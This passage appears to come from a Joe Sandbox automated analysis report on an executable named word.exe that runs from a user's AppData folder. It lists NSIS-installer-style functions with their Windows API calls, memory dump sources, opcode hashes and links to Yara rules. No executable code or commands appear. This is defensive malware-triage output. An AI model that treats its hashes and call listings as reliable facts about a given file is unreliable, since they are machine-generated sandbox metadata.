                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 17d2eea9f7cdce8bc4a623307af2d8c55e83d6c30150793070c9d330b5787031
                                  • Instruction ID: ed496f49c15cb1a0cee1f91230a4d4bd76d3fd25087baa69d2252d5f7e71f344
                                  • Opcode Fuzzy Hash: 17d2eea9f7cdce8bc4a623307af2d8c55e83d6c30150793070c9d330b5787031
                                  • Instruction Fuzzy Hash: 30713271E00228CFDF28DFA8C8547ADBBB1FB44305F15806AD906BB281D7785A96DF44
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406591 Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 61519280ecd7fef69977b9b053ed39a1e65b41a016af8b99da7ecabe5fea5e13
                                  • Instruction ID: c4674237f5282a099a09cde02a4657600336f9fef0cdfe8d994bfdecfa790225
                                  • Opcode Fuzzy Hash: 61519280ecd7fef69977b9b053ed39a1e65b41a016af8b99da7ecabe5fea5e13
                                  • Instruction Fuzzy Hash: 4A714671E00228CFDF28DFA8C8547ADBBB1FB44301F15816AD916BB281C7785A96DF44
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004064DD Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a35431ca5ac5a63de0c48c0fa1b7027ef1301f6ad8cfe25f67b835d71510927c
                                  • Instruction ID: 5a6a632b4197b5bad3eb6902eefc8e88da0621a447eca7476662d6aa47a1fed0
                                  • Opcode Fuzzy Hash: a35431ca5ac5a63de0c48c0fa1b7027ef1301f6ad8cfe25f67b835d71510927c
                                  • Instruction Fuzzy Hash: 93714571E00228CFEF28DF98C8547ADBBB1FB44305F15816AD916BB281C7789A56DF44
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401E38 Relevance: 4.5, APIs: 3, Instructions: 48synchronizationCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00404E84: lstrlenA.KERNEL32(0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000,?), ref: 00404EBD
                                    • Part of subcall function 00404E84: lstrlenA.KERNEL32(00402FBE,0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000), ref: 00404ECD
                                    • Part of subcall function 00404E84: lstrcatA.KERNEL32(0041FD10,00402FBE,00402FBE,0041FD10,00000000,0040F0E0,00000000), ref: 00404EE0
                                    • Part of subcall function 00404E84: SetWindowTextA.USER32(0041FD10,0041FD10), ref: 00404EF2
                                    • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F18
                                    • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F32
                                    • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F40
                                    • Part of subcall function 004053F8: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00422540,Error launching installer), ref: 0040541D
                                    • Part of subcall function 004053F8: CloseHandle.KERNEL32(?), ref: 0040542A
                                  • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E72
                                  • GetExitCodeProcess.KERNELBASE(?,?), ref: 00401E82
                                  • CloseHandle.KERNEL32(?), ref: 00401EA7
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
                                  • String ID:
                                  • API String ID: 3521207402-0
                                  • Opcode ID: fee99b61f809a53683fc29f07b08f3b8ec53ffd30f17739a64443d1dd851e78e
                                  • Instruction ID: 9f74951c8685777ff7248368b05c14b320234156a546818c44ddf0e00d329478
                                  • Opcode Fuzzy Hash: fee99b61f809a53683fc29f07b08f3b8ec53ffd30f17739a64443d1dd851e78e
                                  • Instruction Fuzzy Hash: F0015731E04205EBCF21AFA1D984AAE7A71EF00344F54813BF905B61E1C7BC4A41EB9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: MessageSend
                                  • String ID:
                                  • API String ID: 3850602802-0
                                  • Opcode ID: 3f695f75208f640be867956647b5e414a31c5be601b183f87834ddd8f53d2100
                                  • Instruction ID: 9ae17229e6d33b90ed82c987c6c55cbce7d6b2b41e99f766f3e5bcfc28262e64
                                  • Opcode Fuzzy Hash: 3f695f75208f640be867956647b5e414a31c5be601b183f87834ddd8f53d2100
                                  • Instruction Fuzzy Hash: CA014472B242109BEB184B389C04B2A32A8E710319F10813BF841F72F1D638CC028B4D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405F28 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                                  • GetProcAddress.KERNEL32(00000000,?,?,?,00403165,0000000D), ref: 00405F55
                                    • Part of subcall function 00405EBA: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00405ED1
                                    • Part of subcall function 00405EBA: wsprintfA.USER32 ref: 00405F0A
                                    • Part of subcall function 00405EBA: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00405F1E
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                  • String ID:
                                  • API String ID: 2547128583-0
                                  • Opcode ID: c95d3685517970e0c019aac56d97440eb4eeb9d6cd7db5aa949554c45ee13345
                                  • Instruction ID: ae0a47d2ae808e9ad23d4e83699500a4151a320e34d6f574464110b7e3b32053
                                  • Opcode Fuzzy Hash: c95d3685517970e0c019aac56d97440eb4eeb9d6cd7db5aa949554c45ee13345
                                  • Instruction Fuzzy Hash: 7AE08632A0951176D61097709D0496773ADDAC9740300087EF659F6181D738AC119E6D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040586F Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetFileAttributesA.KERNELBASE(00000003,00402C95,C:\Users\user\AppData\Roaming\word.exe,80000000,00000003), ref: 00405873
                                  • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405895
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: File$AttributesCreate
                                  • String ID:
                                  • API String ID: 415043291-0
                                  • Opcode ID: 5340b84021e5d080a0f841e0942d03c921a309eaf12029fe197c00c0f40f89c7
                                  • Instruction ID: e615d4ce70e2a600ad3370b8a7bf294de68ab1b424622093f8f4c5f34a5113e1
                                  • Opcode Fuzzy Hash: 5340b84021e5d080a0f841e0942d03c921a309eaf12029fe197c00c0f40f89c7
                                  • Instruction Fuzzy Hash: D5D09E31658301AFEF098F20DD1AF2EBBA2EB84B01F10962CB646940E0D6715C59DB16
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403511 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 11COMMON
                                  Download Yara Rule
                                  APIs
                                  • CloseHandle.KERNELBASE(FFFFFFFF), ref: 0040351C
                                  Strings
                                  • C:\Users\user\AppData\Local\Temp\nsiB4B1.tmp\, xrefs: 00403530
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: CloseHandle
                                  • String ID: C:\Users\user\AppData\Local\Temp\nsiB4B1.tmp\
                                  • API String ID: 2962429428-1796680068
                                  • Opcode ID: 69a1ec42bfd2c808f6210beb952dd846253a51cc7dcbdee1183c199696e0200a
                                  • Instruction ID: d56dd6d0e9358e7abe0e1c75cf4fb1a02b43fa7986872cd818a2a6dcef25a25f
                                  • Opcode Fuzzy Hash: 69a1ec42bfd2c808f6210beb952dd846253a51cc7dcbdee1183c199696e0200a
                                  • Instruction Fuzzy Hash: 07C0123090860466D2207F78AE0B7053B58A741336B900725F174B00F2D73C6A41556E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405850 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetFileAttributesA.KERNELBASE(?,0040565B,?,?,?), ref: 00405854
                                  • SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405866
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: AttributesFile
                                  • String ID:
                                  • API String ID: 3188754299-0
                                  • Opcode ID: 526d85b860984864a1b6eb1eb54cd64df673d9b311570f6054ba349a806b51eb
                                  • Instruction ID: 81e3be7da977fa0fdb855dbc2a497946ad1e8e9610c44c99cc48e92da118c7e0
                                  • Opcode Fuzzy Hash: 526d85b860984864a1b6eb1eb54cd64df673d9b311570f6054ba349a806b51eb
                                  • Instruction Fuzzy Hash: C2C00271808501AAD6016B34EE0D81F7B66EB54321B148B25F469A01F0C7315C66DA2A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004053C3 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateDirectoryA.KERNELBASE(?,00000000,004030EE,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 004053C9
                                  • GetLastError.KERNEL32 ref: 004053D7
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: CreateDirectoryErrorLast
                                  • String ID:
                                  • API String ID: 1375471231-0
                                  • Opcode ID: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
                                  • Instruction ID: 6b45de36f316d487aa01e9413b839baa5bb3cf32c01ac4838d60d751b980a7e6
                                  • Opcode Fuzzy Hash: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
                                  • Instruction Fuzzy Hash: E0C04C30619642DBD7105B31ED08B177E60EB50781F208935A506F11E0D6B4D451DD3E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403081 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF), ref: 00403098
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: FileRead
                                  • String ID:
                                  • API String ID: 2738559852-0
                                  • Opcode ID: 27fbe12f246225e3c312bde4903856853e362ca19ec2099a42773af8ab92d4e2
                                  • Instruction ID: e4cef5105026143dd13b930ce46becb45ea6c66ba88fb4286e933b642882ba15
                                  • Opcode Fuzzy Hash: 27fbe12f246225e3c312bde4903856853e362ca19ec2099a42773af8ab92d4e2
                                  • Instruction Fuzzy Hash: F3E08631211118FBDF209E51EC00A973B9CDB04362F008032B904E5190D538DA10DBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004030B3 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E1C,000149E4), ref: 004030C1
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: FilePointer
                                  • String ID:
                                  • API String ID: 973152223-0
                                  • Opcode ID: b482a8c56bd79b67497ba547cc3d1d0f84b07fc9ac7ac5f50d4e9ed509354c89
                                  • Instruction ID: aafe5e0ddee8b519ffd98e4e857b28c3b9165386d483fecacc2863ad1570d206
                                  • Opcode Fuzzy Hash: b482a8c56bd79b67497ba547cc3d1d0f84b07fc9ac7ac5f50d4e9ed509354c89
                                  • Instruction Fuzzy Hash: D6B01231544200BFDB214F00DF06F057B21B79C701F208030B340380F082712430EB1E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Function 00404FC2 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278windowclipboardmemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetDlgItem.USER32(?,00000403), ref: 00405021
                                  • GetDlgItem.USER32(?,000003EE), ref: 00405030
                                  • GetClientRect.USER32 ref: 0040506D
                                  • GetSystemMetrics.USER32 ref: 00405075
                                  • SendMessageA.USER32 ref: 00405096
                                  • SendMessageA.USER32 ref: 004050A7
                                  • SendMessageA.USER32 ref: 004050BA
                                  • SendMessageA.USER32 ref: 004050C8
                                  • SendMessageA.USER32 ref: 004050DB
                                  • ShowWindow.USER32(00000000,?), ref: 004050FD
                                  • ShowWindow.USER32(?,00000008), ref: 00405111
                                  • GetDlgItem.USER32(?,000003EC), ref: 00405132
                                  • SendMessageA.USER32 ref: 00405142
                                  • SendMessageA.USER32 ref: 0040515B
                                  • SendMessageA.USER32 ref: 00405167
                                  • GetDlgItem.USER32(?,000003F8), ref: 0040503F
                                    • Part of subcall function 00403E89: SendMessageA.USER32 ref: 00403E97
                                  • GetDlgItem.USER32(?,000003EC), ref: 00405184
                                  • CreateThread.KERNEL32(00000000,00000000,Function_00004F56,00000000), ref: 00405192
                                  • CloseHandle.KERNEL32(00000000), ref: 00405199
                                  • ShowWindow.USER32(00000000), ref: 004051BD
                                  • ShowWindow.USER32(00000000,00000008), ref: 004051C2
                                  • ShowWindow.USER32(00000008), ref: 00405209
                                  • SendMessageA.USER32 ref: 0040523B
                                  • CreatePopupMenu.USER32 ref: 0040524C
                                  • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405261
                                  • GetWindowRect.USER32(00000000,?), ref: 00405274
                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405298
                                  • SendMessageA.USER32 ref: 004052D3
                                  • OpenClipboard.USER32(00000000), ref: 004052E3
                                  • EmptyClipboard.USER32 ref: 004052E9
                                  • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 004052F2
                                  • GlobalLock.KERNEL32 ref: 004052FC
                                  • SendMessageA.USER32 ref: 00405310
                                  • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405328
                                  • SetClipboardData.USER32 ref: 00405333
                                  • CloseClipboard.USER32 ref: 00405339
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                  • String ID: {
                                  • API String ID: 590372296-366298937
                                  • Opcode ID: 2304b148e9a21fd8fd2dbd7aea04fbfc66f4e7d68f979f8d2529fbafd725d49b
                                  • Instruction ID: 6929f331228a41c4e1f6bf5049925f100d3ed94cd800429e98060a15954be78d
                                  • Opcode Fuzzy Hash: 2304b148e9a21fd8fd2dbd7aea04fbfc66f4e7d68f979f8d2529fbafd725d49b
                                  • Instruction Fuzzy Hash: 6DA13AB1900208BFDB119F60DD89AAE7F79FB44355F00813AFA05BA1A0C7795E41DFA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004047D3 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 478windowmemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetDlgItem.USER32(?,000003F9), ref: 004047EA
                                  • GetDlgItem.USER32(?,00000408), ref: 004047F7
                                  • GlobalAlloc.KERNEL32(00000040,00000001), ref: 00404843
                                  • LoadBitmapA.USER32 ref: 00404856
                                  • SetWindowLongA.USER32(?,000000FC,00404DD4), ref: 00404870
                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404884
                                  • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404898
                                  • SendMessageA.USER32 ref: 004048AD
                                  • SendMessageA.USER32 ref: 004048B9
                                  • SendMessageA.USER32 ref: 004048CB
                                  • DeleteObject.GDI32(?), ref: 004048D0
                                  • SendMessageA.USER32 ref: 004048FB
                                  • SendMessageA.USER32 ref: 00404907
                                  • SendMessageA.USER32 ref: 0040499C
                                  • SendMessageA.USER32 ref: 004049C7
                                  • SendMessageA.USER32 ref: 004049DB
                                  • GetWindowLongA.USER32(?,000000F0), ref: 00404A0A
                                  • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404A18
                                  • ShowWindow.USER32(?,00000005), ref: 00404A29
                                  • SendMessageA.USER32 ref: 00404B2C
                                  • SendMessageA.USER32 ref: 00404B91
                                  • SendMessageA.USER32 ref: 00404BA6
                                  • SendMessageA.USER32 ref: 00404BCA
                                  • SendMessageA.USER32 ref: 00404BF0
                                  • ImageList_Destroy.COMCTL32(?), ref: 00404C05
                                  • GlobalFree.KERNEL32(?), ref: 00404C15
                                  • SendMessageA.USER32 ref: 00404C85
                                  • SendMessageA.USER32 ref: 00404D2E
                                  • SendMessageA.USER32 ref: 00404D3D
                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00404D5D
                                  • ShowWindow.USER32(?,00000000), ref: 00404DAB
                                  • GetDlgItem.USER32(?,000003FE), ref: 00404DB6
                                  • ShowWindow.USER32(00000000), ref: 00404DBD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
